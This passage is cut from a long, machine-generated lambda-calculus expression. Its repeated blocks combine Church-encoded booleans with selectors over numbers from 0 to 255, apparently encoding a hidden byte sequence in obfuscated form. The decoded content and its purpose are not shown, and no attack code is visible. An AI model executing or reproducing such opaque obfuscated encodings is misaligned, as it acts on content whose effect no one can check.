(((lambda s_67 lambda s_79 ((67)(79))(67))((lambda s_34 lambda s_92 lambda s_176 ((34)
(176))(92))(72)))(154)))(lambda s_1 lambda s_0 0))(lambda s_7 lambda s_72 7))))
(((lambda s_250 lambda s_132 ((lambda s_100 lambda s_173 ((100)(100))(173))(((lambda
s_214 lambda s_176 ((214)(176))(214))(132))((lambda s_197 lambda s_244 lambda s_83
((197)(83))(244))(250))))(((lambda s_248 lambda s_97 ((248)(97))(248))((lambda s_87
lambda s_202 lambda s_168 ((87)(168))(202))(132)))(250)))(lambda s_1 lambda s_0 1))
(lambda s_21 lambda s_24 24))))(((lambda s_94 lambda s_197 ((lambda s_95 lambda s_16
((95)(95))(16))(((lambda s_173 lambda s_172 ((173)(172))(173))(197))((lambda s_42
lambda s_19 lambda s_156 ((42)(156))(19))(94))))(((lambda s_176 lambda s_2 ((176)(2))
(176))((lambda s_45 lambda s_90 lambda s_13 ((45)(13))(90))(197)))(94)))(lambda s_1
lambda s_0 0))(lambda s_201 lambda s_149 201))))(((lambda s_244 lambda s_76 ((lambda
s_166 lambda s_243 ((166)(166))(243))(((lambda s_92 lambda s_175 ((92)(175))(92))(76))
((lambda s_123 lambda s_175 lambda s_40 ((123)(40))(175))(244))))(((lambda s_248 lambda
s_123 ((248)(123))(248))((lambda s_16 lambda s_235 lambda s_229 ((16)(229))(235))(76)))
(244)))(lambda s_0 lambda s_1 0))(lambda s_63 lambda s_92 92))))(((lambda s_117 lambda
s_32 ((lambda s_87 lambda s_46 ((87)(87))(46))(((lambda s_59 lambda s_114 ((59)(114))
(59))(32))((lambda s_5 lambda s_203 lambda s_62 ((5)(62))(203))(117))))(((lambda s_60
lambda s_1 ((60)(1))(60))((lambda s_173 lambda s_122 lambda s_92 ((173)(92))(122))
(32)))(117)))(lambda s_1 lambda s_0 0))(lambda s_249 lambda s_225 249))))(((lambda s_16
lambda s_141 ((lambda s_220 lambda s_147 ((220)(220))(147))(((lambda s_16 lambda s_242
((16)(242))(16))(141))((lambda s_167 lambda s_206 lambda s_26 ((167)(26))(206))(16))))
(((lambda s_252 lambda s_248 ((252)(248))(252))((lambda s_28 lambda s_17 lambda s_210
((28)(210))(17))(141)))(16)))(lambda s_1 lambda s_0 1))(lambda s_243 lambda s_92 92))))
(((lambda s_143 lambda s_78 ((lambda s_155 lambda s_107 ((155)(155))(107))(((lambda
s_145 lambda s_212 ((145)(212))(145))(78))((lambda s_59 lambda s_200 lambda s_253 ((59)
(253))(200))(143))))(((lambda s_146 lambda s_119 ((146)(119))(146))((lambda s_43 lambda
s_17 lambda s_176 ((43)(176))(17))(78)))(143)))(lambda s_1 lambda s_0 0))(lambda s_54
lambda s_15 54))))(((lambda s_43 lambda s_239 ((lambda s_89 lambda s_184 ((89)(89))
(184))(((lambda s_114 lambda s_193 ((114)(193))(114))(239))((lambda s_119 lambda s_205
lambda s_98 ((119)(98))(205))(43))))(((lambda s_200 lambda s_53 ((200)(53))(200))
((lambda s_164 lambda s_224 lambda s_125 ((164)(125))(224))(239)))(43)))(lambda s_0
lambda s_1 1))(lambda s_16 lambda s_236 16))))(((lambda s_154 lambda s_124 ((lambda s_1
lambda s_215 ((1)(1))(215))(((lambda s_45 lambda s_40 ((45)(40))(45))(124))((lambda
s_153 lambda s_223 lambda s_100 ((153)(100))(223))(154))))(((lambda s_56 lambda s_188
((56)(188))(56))((lambda s_3 lambda s_251 lambda s_187 ((3)(187))(251))(124)))(154)))
(lambda s_0 lambda s_1 1))(lambda s_34 lambda s_218 34))))(((lambda s_237 lambda s_183
((lambda s_119 lambda s_237 ((119)(119))(237))(((lambda s_63 lambda s_42 ((63)(42))
(63))(183))((lambda s_23 lambda s_47 lambda s_149 ((23)(149))(47))(237))))(((lambda
s_33 lambda s_233 ((33)(233))(33))((lambda s_28 lambda s_112 lambda s_142 ((28)(142))
(112))(183)))(237)))(lambda s_0 lambda s_1 0))(lambda s_170 lambda s_19 19))))(((lambda
s_109 lambda s_220 ((lambda s_210 lambda s_19 ((210)(210))(19))(((lambda s_136 lambda
s_215 ((136)(215))(136))(220))((lambda s_21 lambda s_30 lambda s_165 ((21)(165))(30))
(109))))(((lambda s_153 lambda s_164 ((153)(164))(153))((lambda s_38 lambda s_197
lambda s_139 ((38)(139))(197))(220)))(109)))(lambda s_0 lambda s_1 0))(lambda s_109
lambda s_40 40))))(((lambda s_42 lambda s_123 ((lambda s_137 lambda s_46 ((137)(137))
(46))(((lambda s_34 lambda s_155 ((34)(155))(34))(123))((lambda s_229 lambda s_195
lambda s_36 ((229)(36))(195))(42))))(((lambda s_128 lambda s_62 ((128)(62))(128))
((lambda s_213 lambda s_81 lambda s_224 ((213)(224))(81))(123)))(42)))(lambda s_0
lambda s_1 0))(lambda s_211 lambda s_204 204))))(((lambda s_251 lambda s_247 ((lambda
s_233 lambda s_80 ((233)(233))(80))(((lambda s_21 lambda s_146 ((21)(146))(21))(247))
((lambda s_149 lambda s_208 lambda s_224 ((149)(224))(208))(251))))(((lambda s_91
lambda s_76 ((91)(76))(91))((lambda s_229 lambda s_205 lambda s_248 ((229)(248))(205))
(247)))(251)))(lambda s_0 lambda s_1 0))(lambda s_214 lambda s_130 130))))(((lambda
s_206 lambda s_114 ((lambda s_179 lambda s_51 ((179)(179))(51))(((lambda s_134 lambda
s_109 ((134)(109))(134))(114))((lambda s_160 lambda s_63 lambda s_80 ((160)(80))(63))
(206))))(((lambda s_35 lambda s_186 ((35)(186))(35))((lambda s_63 lambda s_58 lambda
s_109 ((63)(109))(58))(114)))(206)))(lambda s_1 lambda s_0 1))(lambda s_47 lambda s_60
60))))(((lambda s_35 lambda s_74 ((lambda s_152 lambda s_76 ((152)(152))(76))(((lambda
s_240 lambda s_191 ((240)(191))(240))(74))((lambda s_231 lambda s_6 lambda s_177 ((231)
(177))(6))(35))))(((lambda s_25 lambda s_158 ((25)(158))(25))((lambda s_62 lambda s_171
lambda s_174 ((62)(174))(171))(74)))(35)))(lambda s_0 lambda s_1 1))(lambda s_32 lambda
s_49 32))))(((lambda s_8 lambda s_55 ((lambda s_21 lambda s_126 ((21)(21))(126))
(((lambda s_230 lambda s_7 ((230)(7))(230))(55))((lambda s_218 lambda s_69 lambda s_23
((218)(23))(69))(8))))(((lambda s_83 lambda s_132 ((83)(132))(83))((lambda s_151 lambda
s_101 lambda s_42 ((151)(42))(101))(55)))(8)))(lambda s_1 lambda s_0 0))(lambda s_143
lambda s_212 143))))(((lambda s_152 lambda s_36 ((lambda s_202 lambda s_176 ((202)
(202))(176))(((lambda s_136 lambda s_48 ((136)(48))(136))(36))((lambda s_221 lambda
s_26 lambda s_104 ((221)(104))(26))(152))))(((lambda s_215 lambda s_191 ((215)(191))
(215))((lambda s_57 lambda s_13 lambda s_246 ((57)(246))(13))(36)))(152)))(lambda s_1
lambda s_0 0))(lambda s_215 lambda s_232 215))))(((lambda s_141 lambda s_239 ((lambda
s_254 lambda s_67 ((254)(254))(67))(((lambda s_102 lambda s_28 ((102)(28))(102))(239))
((lambda s_150 lambda s_11 lambda s_180 ((150)(180))(11))(141))))(((lambda s_115 lambda
s_72 ((115)(72))(115))((lambda s_107 lambda s_47 lambda s_94 ((107)(94))(47))(239)))
(141)))(lambda s_0 lambda s_1 1))(lambda s_204 lambda s_126 204))))(((lambda s_230
lambda s_3 ((lambda s_3 lambda s_101 ((3)(3))(101))(((lambda s_107 lambda s_118 ((107)
(118))(107))(3))((lambda s_36 lambda s_51 lambda s_116 ((36)(116))(51))(230))))
(((lambda s_39 lambda s_165 ((39)(165))(39))((lambda s_34 lambda s_201 lambda s_253
((34)(253))(201))(3)))(230)))(lambda s_1 lambda s_0 0))(lambda s_146 lambda s_72
146))))(((lambda s_142 lambda s_118 ((lambda s_77 lambda s_99 ((77)(77))(99))(((lambda
s_191 lambda s_248 ((191)(248))(191))(118))((lambda s_124 lambda s_79 lambda s_201
((124)(201))(79))(142))))(((lambda s_31 lambda s_183 ((31)(183))(31))((lambda s_231
lambda s_114 lambda s_160 ((231)(160))(114))(118)))(142)))(lambda s_0 lambda s_1 1))
(lambda s_165 lambda s_142 165))))(((lambda s_59 lambda s_147 ((lambda s_43 lambda
s_117 ((43)(43))(117))(((lambda s_39 lambda s_236 ((39)(236))(39))(147))((lambda s_190
lambda s_176 lambda s_75 ((190)(75))(176))(59))))(((lambda s_148 lambda s_85 ((148)
(85))(148))((lambda s_162 lambda s_152 lambda s_38 ((162)(38))(152))(147)))(59)))
(lambda s_1 lambda s_0 1))(lambda s_183 lambda s_94 94))))(((lambda s_170 lambda s_166
((lambda s_235 lambda s_230 ((235)(235))(230))(((lambda s_240 lambda s_42 ((240)(42))
(240))(166))((lambda s_197 lambda s_231 lambda s_77 ((197)(77))(231))(170))))(((lambda
s_227 lambda s_137 ((227)(137))(227))((lambda s_131 lambda s_79 lambda s_86 ((131)(86))
(79))(166)))(170)))(lambda s_0 lambda s_1 0))(lambda s_139 lambda s_12 12))))(((lambda
s_2 lambda s_35 ((lambda s_9 lambda s_139 ((9)(9))(139))(((lambda s_34 lambda s_181
((34)(181))(34))(35))((lambda s_32 lambda s_211 lambda s_209 ((32)(209))(211))(2))))
(((lambda s_225 lambda s_71 ((225)(71))(225))((lambda s_25 lambda s_225 lambda s_11
((25)(11))(225))(35)))(2)))(lambda s_1 lambda s_0 0))(lambda s_214 lambda s_105 214))))
(((lambda s_15 lambda s_199 ((lambda s_40 lambda s_89 ((40)(40))(89))(((lambda s_132
lambda s_43 ((132)(43))(132))(199))((lambda s_137 lambda s_248 lambda s_245 ((137)
(245))(248))(15))))(((lambda s_163 lambda s_13 ((163)(13))(163))((lambda s_159 lambda
s_207 lambda s_190 ((159)(190))(207))(199)))(15)))(lambda s_1 lambda s_0 0))(lambda
s_106 lambda s_52 106))))(((lambda s_95 lambda s_180 ((lambda s_87 lambda s_200 ((87)
(87))(200))(((lambda s_252 lambda s_210 ((252)(210))(252))(180))((lambda s_28 lambda
s_111 lambda s_153 ((28)(153))(111))(95))))(((lambda s_223 lambda s_84 ((223)(84))
(223))((lambda s_146 lambda s_186 lambda s_144 ((146)(144))(186))(180)))(95)))(lambda
s_0 lambda s_1 1))(lambda s_212 lambda s_211 212))))(((lambda s_88 lambda s_96 ((lambda
s_9 lambda s_224 ((9)(9))(224))(((lambda s_249 lambda s_137 ((249)(137))(249))(96))
((lambda s_75 lambda s_13 lambda s_205 ((75)(205))(13))(88))))(((lambda s_235 lambda
s_41 ((235)(41))(235))((lambda s_87 lambda s_100 lambda s_23 ((87)(23))(100))(96)))
(88)))(lambda s_0 lambda s_1 1))(lambda s_231 lambda s_40 231))))(((lambda s_24 lambda
s_21 ((lambda s_194 lambda s_187 ((194)(194))(187))(((lambda s_107 lambda s_240 ((107)
(240))(107))(21))((lambda s_253 lambda s_205 lambda s_139 ((253)(139))(205))(24))))
(((lambda s_140 lambda s_105 ((140)(105))(140))((lambda s_144 lambda s_157 lambda s_164
((144)(164))(157))(21)))(24)))(lambda s_1 lambda s_0 0))(lambda s_111 lambda s_93
111))))(((lambda s_58 lambda s_9 ((lambda s_126 lambda s_72 ((126)(126))(72))(((lambda
s_130 lambda s_49 ((130)(49))(130))(9))((lambda s_134 lambda s_69 lambda s_122 ((134)
(122))(69))(58))))(((lambda s_212 lambda s_165 ((212)(165))(212))((lambda s_112 lambda
s_67 lambda s_207 ((112)(207))(67))(9)))(58)))(lambda s_1 lambda s_0 1))(lambda s_212
lambda s_186 186))))(((lambda s_141 lambda s_195 ((lambda s_145 lambda s_18 ((145)
(145))(18))(((lambda s_97 lambda s_161 ((97)(161))(97))(195))((lambda s_252 lambda
s_100 lambda s_42 ((252)(42))(100))(141))))(((lambda s_178 lambda s_7 ((178)(7))(178))
((lambda s_244 lambda s_97 lambda s_133 ((244)(133))(97))(195)))(141)))(lambda s_1
lambda s_0 0))(lambda s_94 lambda s_89 94))))(((lambda s_46 lambda s_126 ((lambda s_85
lambda s_213 ((85)(85))(213))(((lambda s_138 lambda s_49 ((138)(49))(138))(126))
((lambda s_216 lambda s_221 lambda s_123 ((216)(123))(221))(46))))(((lambda s_191
lambda s_179 ((191)(179))(191))((lambda s_53 lambda s_106 lambda s_87 ((53)(87))(106))
(126)))(46)))(lambda s_0 lambda s_1 1))(lambda s_11 lambda s_51 11))))(((lambda s_225
lambda s_198 ((lambda s_115 lambda s_187 ((115)(115))(187))(((lambda s_98 lambda s_222
((98)(222))(98))(198))((lambda s_158 lambda s_67 lambda s_144 ((158)(144))(67))(225))))
(((lambda s_12 lambda s_234 ((12)(234))(12))((lambda s_224 lambda s_214 lambda s_145
((224)(145))(214))(198)))(225)))(lambda s_1 lambda s_0 0))(lambda s_173 lambda s_77
173))))(((lambda s_136 lambda s_213 ((lambda s_56 lambda s_28 ((56)(56))(28))(((lambda
s_15 lambda s_34 ((15)(34))(15))(213))((lambda s_249 lambda s_181 lambda s_67 ((249)
(67))(181))(136))))(((lambda s_40 lambda s_4 ((40)(4))(40))((lambda s_46 lambda s_136
lambda s_119 ((46)(119))(136))(213)))(136)))(lambda s_1 lambda s_0 1))(lambda s_241
lambda s_61 61))))(((lambda s_81 lambda s_240 ((lambda s_79 lambda s_51 ((79)(79))(51))
(((lambda s_124 lambda s_234 ((124)(234))(124))(240))((lambda s_32 lambda s_251 lambda
s_206 ((32)(206))(251))(81))))(((lambda s_201 lambda s_121 ((201)(121))(201))((lambda
s_139 lambda s_158 lambda s_123 ((139)(123))(158))(240)))(81)))(lambda s_1 lambda s_0
0))(lambda s_67 lambda s_182 67))))(((lambda s_98 lambda s_239 ((lambda s_132 lambda
s_0 ((132)(132))(0))(((lambda s_186 lambda s_33 ((186)(33))(186))(239))((lambda s_18
lambda s_107 lambda s_207 ((18)(207))(107))(98))))(((lambda s_71 lambda s_187 ((71)
(187))(71))((lambda s_73 lambda s_14 lambda s_52 ((73)(52))(14))(239)))(98)))(lambda
s_1 lambda s_0 1))(lambda s_195 lambda s_200 200))))(((lambda s_162 lambda s_19
((lambda s_133 lambda s_64 ((133)(133))(64))(((lambda s_153 lambda s_185 ((153)(185))
(153))(19))((lambda s_225 lambda s_241 lambda s_30 ((225)(30))(241))(162))))(((lambda
s_5 lambda s_198 ((5)(198))(5))((lambda s_147 lambda s_95 lambda s_235 ((147)(235))
(95))(19)))(162)))(lambda s_1 lambda s_0 0))(lambda s_43 lambda s_72 43))))(((lambda
s_127 lambda s_94 ((lambda s_186 lambda s_205 ((186)(186))(205))(((lambda s_250 lambda
s_241 ((250)(241))(250))(94))((lambda s_156 lambda s_89 lambda s_201 ((156)(201))(89))
(127))))(((lambda s_255 lambda s_152 ((255)(152))(255))((lambda s_191 lambda s_45
lambda s_83 ((191)(83))(45))(94)))(127)))(lambda s_0 lambda s_1 1))(lambda s_72 lambda
s_152 72))))(((lambda s_61 lambda s_9 ((lambda s_62 lambda s_79 ((62)(62))(79))
(((lambda s_69 lambda s_231 ((69)(231))(69))(9))((lambda s_237 lambda s_124 lambda
s_142 ((237)(142))(124))(61))))(((lambda s_2 lambda s_24 ((2)(24))(2))((lambda s_237
lambda s_209 lambda s_169 ((237)(169))(209))(9)))(61)))(lambda s_1 lambda s_0 0))
(lambda s_66 lambda s_0 66))))(((lambda s_7 lambda s_31 ((lambda s_36 lambda s_55 ((36)
(36))(55))(((lambda s_94 lambda s_225 ((94)(225))(94))(31))((lambda s_62 lambda s_224
lambda s_188 ((62)(188))(224))(7))))(((lambda s_254 lambda s_230 ((254)(230))(254))
((lambda s_205 lambda s_42 lambda s_155 ((205)(155))(42))(31)))(7)))(lambda s_0 lambda
s_1 0))(lambda s_166 lambda s_116 116))))(((lambda s_104 lambda s_204 ((lambda s_181
lambda s_173 ((181)(181))(173))(((lambda s_34 lambda s_201 ((34)(201))(34))(204))
((lambda s_210 lambda s_37 lambda s_220 ((210)(220))(37))(104))))(((lambda s_98 lambda
s_156 ((98)(156))(98))((lambda s_135 lambda s_227 lambda s_223 ((135)(223))(227))
(204)))(104)))(lambda s_1 lambda s_0 0))(lambda s_212 lambda s_168 212))))(((lambda
s_126 lambda s_66 ((lambda s_66 lambda s_168 ((66)(66))(168))(((lambda s_231 lambda
s_241 ((231)(241))(231))(66))((lambda s_21 lambda s_251 lambda s_249 ((21)(249))(251))
(126))))(((lambda s_237 lambda s_229 ((237)(229))(237))((lambda s_134 lambda s_158
lambda s_99 ((134)(99))(158))(66)))(126)))(lambda s_0 lambda s_1 1))(lambda s_220
lambda s_106 220))))(((lambda s_141 lambda s_170 ((lambda s_17 lambda s_35 ((17)(17))
(35))(((lambda s_60 lambda s_106 ((60)(106))(60))(170))((lambda s_40 lambda s_105
lambda s_164 ((40)(164))(105))(141))))(((lambda s_255 lambda s_36 ((255)(36))(255))
((lambda s_248 lambda s_215 lambda s_237 ((248)(237))(215))(170)))(141)))(lambda s_0
lambda s_1 1))(lambda s_250 lambda s_168 250))))(((lambda s_150 lambda s_255 ((lambda
s_4 lambda s_40 ((4)(4))(40))(((lambda s_38 lambda s_60 ((38)(60))(38))(255))((lambda
s_4 lambda s_201 lambda s_174 ((4)(174))(201))(150))))(((lambda s_41 lambda s_232 ((41)
(232))(41))((lambda s_177 lambda s_218 lambda s_143 ((177)(143))(218))(255)))(150)))
(lambda s_0 lambda s_1 0))(lambda s_225 lambda s_206 206))))(((lambda s_138 lambda
s_248 ((lambda s_163 lambda s_215 ((163)(163))(215))(((lambda s_229 lambda s_225 ((229)
(225))(229))(248))((lambda s_89 lambda s_71 lambda s_160 ((89)(160))(71))(138))))
(((lambda s_220 lambda s_103 ((220)(103))(220))((lambda s_127 lambda s_52 lambda s_24
((127)(24))(52))(248)))(138)))(lambda s_0 lambda s_1 0))(lambda s_7 lambda s_93 93))))
(((lambda s_28 lambda s_73 ((lambda s_168 lambda s_90 ((168)(168))(90))(((lambda s_45
lambda s_177 ((45)(177))(45))(73))((lambda s_203 lambda s_74 lambda s_230 ((203)(230))
(74))(28))))(((lambda s_73 lambda s_1 ((73)(1))(73))((lambda s_152 lambda s_80 lambda
s_29 ((152)(29))(80))(73)))(28)))(lambda s_0 lambda s_1 1))(lambda s_162 lambda s_120
162))))(((lambda s_219 lambda s_75 ((lambda s_27 lambda s_227 ((27)(27))(227))(((lambda
s_165 lambda s_151 ((165)(151))(165))(75))((lambda s_241 lambda s_38 lambda s_165
((241)(165))(38))(219))))(((lambda s_146 lambda s_32 ((146)(32))(146))((lambda s_218
lambda s_58 lambda s_104 ((218)(104))(58))(75)))(219)))(lambda s_1 lambda s_0 0))
(lambda s_134 lambda s_106 134))))(((lambda s_34 lambda s_237 ((lambda s_53 lambda s_55
((53)(53))(55))(((lambda s_8 lambda s_197 ((8)(197))(8))(237))((lambda s_79 lambda
s_219 lambda s_145 ((79)(145))(219))(34))))(((lambda s_8 lambda s_30 ((8)(30))(8))
((lambda s_54 lambda s_39 lambda s_208 ((54)(208))(39))(237)))(34)))(lambda s_1 lambda
s_0 1))(lambda s_127 lambda s_231 231))))(((lambda s_55 lambda s_102 ((lambda s_14
lambda s_176 ((14)(14))(176))(((lambda s_6 lambda s_190 ((6)(190))(6))(102))((lambda
s_19 lambda s_214 lambda s_251 ((19)(251))(214))(55))))(((lambda s_44 lambda s_193
((44)(193))(44))((lambda s_180 lambda s_135 lambda s_178 ((180)(178))(135))(102)))
(55)))(lambda s_0 lambda s_1 0))(lambda s_227 lambda s_153 153))))(((lambda s_32 lambda
s_186 ((lambda s_88 lambda s_54 ((88)(88))(54))(((lambda s_91 lambda s_72 ((91)(72))
(91))(186))((lambda s_168 lambda s_47 lambda s_33 ((168)(33))(47))(32))))(((lambda
s_236 lambda s_90 ((236)(90))(236))((lambda s_63 lambda s_72 lambda s_130 ((63)(130))
(72))(186)))(32)))(lambda s_0 lambda s_1 1))(lambda s_217 lambda s_45 217))))(((lambda
s_170 lambda s_51 ((lambda s_55 lambda s_103 ((55)(55))(103))(((lambda s_155 lambda
s_174 ((155)(174))(155))(51))((lambda s_182 lambda s_52 lambda s_227 ((182)(227))(52))
(170))))(((lambda s_183 lambda s_201 ((183)(201))(183))((lambda s_113 lambda s_142
lambda s_72 ((113)(72))(142))(51)))(170)))(lambda s_1 lambda s_0 1))(lambda s_235
lambda s_214 214))))(((lambda s_155 lambda s_212 ((lambda s_192 lambda s_52 ((192)
(192))(52))(((lambda s_107 lambda s_60 ((107)(60))(107))(212))((lambda s_151 lambda
s_160 lambda s_39 ((151)(39))(160))(155))))(((lambda s_34 lambda s_251 ((34)(251))(34))
((lambda s_13 lambda s_122 lambda s_29 ((13)(29))(122))(212)))(155)))(lambda s_1 lambda
s_0 1))(lambda s_228 lambda s_34 34))))(((lambda s_2 lambda s_36 ((lambda s_54 lambda
s_76 ((54)(54))(76))(((lambda s_57 lambda s_197 ((57)(197))(57))(36))((lambda s_70
lambda s_78 lambda s_194 ((70)(194))(78))(2))))(((lambda s_58 lambda s_253 ((58)(253))
(58))((lambda s_151 lambda s_37 lambda s_249 ((151)(249))(37))(36)))(2)))(lambda s_1
lambda s_0 0))(lambda s_139 lambda s_132 139))))(((lambda s_81 lambda s_162 ((lambda
s_101 lambda s_68 ((101)(101))(68))(((lambda s_249 lambda s_92 ((249)(92))(249))(162))
((lambda s_223 lambda s_251 lambda s_167 ((223)(167))(251))(81))))(((lambda s_235
lambda s_44 ((235)(44))(235))((lambda s_8 lambda s_177 lambda s_199 ((8)(199))(177))
(162)))(81)))(lambda s_0 lambda s_1 1))(lambda s_201 lambda s_132 201))))(((lambda s_38
lambda s_202 ((lambda s_175 lambda s_121 ((175)(175))(121))(((lambda s_88 lambda s_199
((88)(199))(88))(202))((lambda s_177 lambda s_219 lambda s_42 ((177)(42))(219))(38))))
(((lambda s_109 lambda s_176 ((109)(176))(109))((lambda s_68 lambda s_230 lambda s_20
((68)(20))(230))(202)))(38)))(lambda s_0 lambda s_1 0))(lambda s_227 lambda s_106
106))))(((lambda s_221 lambda s_102 ((lambda s_97 lambda s_87 ((97)(97))(87))(((lambda
s_214 lambda s_153 ((214)(153))(214))(102))((lambda s_216 lambda s_247 lambda s_201
((216)(201))(247))(221))))(((lambda s_23 lambda s_176 ((23)(176))(23))((lambda s_30
lambda s_212 lambda s_222 ((30)(222))(212))(102)))(221)))(lambda s_0 lambda s_1 1))
(lambda s_146 lambda s_141 146))))(((lambda s_217 lambda s_242 ((lambda s_235 lambda
s_161 ((235)(235))(161))(((lambda s_165 lambda s_169 ((165)(169))(165))(242))((lambda
s_181 lambda s_167 lambda s_39 ((181)(39))(167))(217))))(((lambda s_119 lambda s_0
((119)(0))(119))((lambda s_64 lambda s_254 lambda s_113 ((64)(113))(254))(242)))(217)))
(lambda s_1 lambda s_0 0))(lambda s_244 lambda s_228 244))))(((lambda s_117 lambda
s_206 ((lambda s_34 lambda s_42 ((34)(34))(42))(((lambda s_188 lambda s_240 ((188)
(240))(188))(206))((lambda s_200 lambda s_62 lambda s_211 ((200)(211))(62))(117))))
(((lambda s_57 lambda s_70 ((57)(70))(57))((lambda s_16 lambda s_124 lambda s_80 ((16)
(80))(124))(206)))(117)))(lambda s_1 lambda s_0 1))(lambda s_213 lambda s_4 4))))
(((lambda s_164 lambda s_205 ((lambda s_102 lambda s_247 ((102)(102))(247))(((lambda
s_208 lambda s_20 ((208)(20))(208))(205))((lambda s_217 lambda s_173 lambda s_116
((217)(116))(173))(164))))(((lambda s_81 lambda s_57 ((81)(57))(81))((lambda s_92
lambda s_20 lambda s_155 ((92)(155))(20))(205)))(164)))(lambda s_0 lambda s_1 1))
(lambda s_112 lambda s_31 112))))(((lambda s_98 lambda s_114 ((lambda s_98 lambda s_91
((98)(98))(91))(((lambda s_227 lambda s_176 ((227)(176))(227))(114))((lambda s_131
lambda s_89 lambda s_239 ((131)(239))(89))(98))))(((lambda s_55 lambda s_123 ((55)
(123))(55))((lambda s_87 lambda s_17 lambda s_239 ((87)(239))(17))(114)))(98)))(lambda
s_0 lambda s_1 0))(lambda s_224 lambda s_167 167))))(((lambda s_251 lambda s_153
((lambda s_195 lambda s_147 ((195)(195))(147))(((lambda s_243 lambda s_228 ((243)(228))
(243))(153))((lambda s_209 lambda s_251 lambda s_176 ((209)(176))(251))(251))))
(((lambda s_188 lambda s_10 ((188)(10))(188))((lambda s_149 lambda s_117 lambda s_115
((149)(115))(117))(153)))(251)))(lambda s_1 lambda s_0 0))(lambda s_117 lambda s_247
117))))(((lambda s_161 lambda s_57 ((lambda s_241 lambda s_16 ((241)(241))(16))
(((lambda s_221 lambda s_189 ((221)(189))(221))(57))((lambda s_47 lambda s_102 lambda
s_51 ((47)(51))(102))(161))))(((lambda s_190 lambda s_7 ((190)(7))(190))((lambda s_51
lambda s_15 lambda s_110 ((51)(110))(15))(57)))(161)))(lambda s_1 lambda s_0 1))(lambda
s_99 lambda s_67 67))))(((lambda s_143 lambda s_147 ((lambda s_189 lambda s_190 ((189)
(189))(190))(((lambda s_188 lambda s_149 ((188)(149))(188))(147))((lambda s_113 lambda
s_135 lambda s_117 ((113)(117))(135))(143))))(((lambda s_86 lambda s_73 ((86)(73))(86))
((lambda s_75 lambda s_221 lambda s_9 ((75)(9))(221))(147)))(143)))(lambda s_0 lambda
s_1 1))(lambda s_99 lambda s_62 99))))(((lambda s_119 lambda s_2 ((lambda s_255 lambda
s_225 ((255)(255))(225))(((lambda s_185 lambda s_196 ((185)(196))(185))(2))((lambda
s_138 lambda s_161 lambda s_96 ((138)(96))(161))(119))))(((lambda s_204 lambda s_210
((204)(210))(204))((lambda s_159 lambda s_175 lambda s_109 ((159)(109))(175))(2)))
(119)))(lambda s_1 lambda s_0 1))(lambda s_199 lambda s_78 78))))(((lambda s_155 lambda
s_86 ((lambda s_217 lambda s_68 ((217)(217))(68))(((lambda s_150 lambda s_190 ((150)
(190))(150))(86))((lambda s_150 lambda s_71 lambda s_43 ((150)(43))(71))(155))))
(((lambda s_26 lambda s_192 ((26)(192))(26))((lambda s_193 lambda s_81 lambda s_208
((193)(208))(81))(86)))(155)))(lambda s_0 lambda s_1 1))(lambda s_62 lambda s_164
62))))(((lambda s_102 lambda s_245 ((lambda s_178 lambda s_79 ((178)(178))(79))
(((lambda s_103 lambda s_175 ((103)(175))(103))(245))((lambda s_217 lambda s_244 lambda
s_107 ((217)(107))(244))(102))))(((lambda s_213 lambda s_184 ((213)(184))(213))((lambda
s_228 lambda s_161 lambda s_235 ((228)(235))(161))(245)))(102)))(lambda s_0 lambda s_1
1))(lambda s_142 lambda s_198 142))))(((lambda s_98 lambda s_56 ((lambda s_147 lambda
s_116 ((147)(147))(116))(((lambda s_150 lambda s_246 ((150)(246))(150))(56))((lambda
s_76 lambda s_52 lambda s_117 ((76)(117))(52))(98))))(((lambda s_243 lambda s_44 ((243)
(44))(243))((lambda s_13 lambda s_134 lambda s_237 ((13)(237))(134))(56)))(98)))(lambda
s_1 lambda s_0 0))(lambda s_64 lambda s_86 64))))(((lambda s_197 lambda s_147 ((lambda
s_42 lambda s_38 ((42)(42))(38))(((lambda s_140 lambda s_22 ((140)(22))(140))(147))
((lambda s_208 lambda s_134 lambda s_201 ((208)(201))(134))(197))))(((lambda s_107
lambda s_183 ((107)(183))(107))((lambda s_23 lambda s_55 lambda s_56 ((23)(56))(55))
(147)))(197)))(lambda s_0 lambda s_1 1))(lambda s_77 lambda s_135 77))))(((lambda s_95
lambda s_176 ((lambda s_197 lambda s_244 ((197)(197))(244))(((lambda s_210 lambda s_146
((210)(146))(210))(176))((lambda s_36 lambda s_253 lambda s_214 ((36)(214))(253))
(95))))(((lambda s_5 lambda s_54 ((5)(54))(5))((lambda s_198 lambda s_180 lambda s_177
((198)(177))(180))(176)))(95)))(lambda s_0 lambda s_1 0))(lambda s_190 lambda s_160
160))))(((lambda s_42 lambda s_207 ((lambda s_77 lambda s_232 ((77)(77))(232))(((lambda
s_198 lambda s_75 ((198)(75))(198))(207))((lambda s_81 lambda s_80 lambda s_165 ((81)
(165))(80))(42))))(((lambda s_103 lambda s_158 ((103)(158))(103))((lambda s_29 lambda
s_105 lambda s_41 ((29)(41))(105))(207)))(42)))(lambda s_1 lambda s_0 1))(lambda s_172
lambda s_255 255))))(((lambda s_169 lambda s_154 ((lambda s_198 lambda s_141 ((198)
(198))(141))(((lambda s_177 lambda s_75 ((177)(75))(177))(154))((lambda s_56 lambda
s_194 lambda s_221 ((56)(221))(194))(169))))(((lambda s_42 lambda s_102 ((42)(102))
(42))((lambda s_89 lambda s_88 lambda s_95 ((89)(95))(88))(154)))(169)))(lambda s_0
lambda s_1 0))(lambda s_214 lambda s_225 225))))(((lambda s_47 lambda s_220 ((lambda
s_79 lambda s_10 ((79)(79))(10))(((lambda s_91 lambda s_233 ((91)(233))(91))(220))
((lambda s_16 lambda s_25 lambda s_123 ((16)(123))(25))(47))))(((lambda s_48 lambda
s_168 ((48)(168))(48))((lambda s_225 lambda s_140 lambda s_252 ((225)(252))(140))
(220)))(47)))(lambda s_1 lambda s_0 0))(lambda s_140 lambda s_16 140))))(((lambda s_22
lambda s_48 ((lambda s_83 lambda s_228 ((83)(83))(228))(((lambda s_150 lambda s_255
((150)(255))(150))(48))((lambda s_41 lambda s_103 lambda s_0 ((41)(0))(103))(22))))
(((lambda s_178 lambda s_171 ((178)(171))(178))((lambda s_236 lambda s_35 lambda s_129
((236)(129))(35))(48)))(22)))(lambda s_0 lambda s_1 0))(lambda s_31 lambda s_100
100))))(((lambda s_118 lambda s_88 ((lambda s_109 lambda s_48 ((109)(109))(48))
(((lambda s_172 lambda s_11 ((172)(11))(172))(88))((lambda s_221 lambda s_23 lambda
s_143 ((221)(143))(23))(118))))(((lambda s_95 lambda s_201 ((95)(201))(95))((lambda
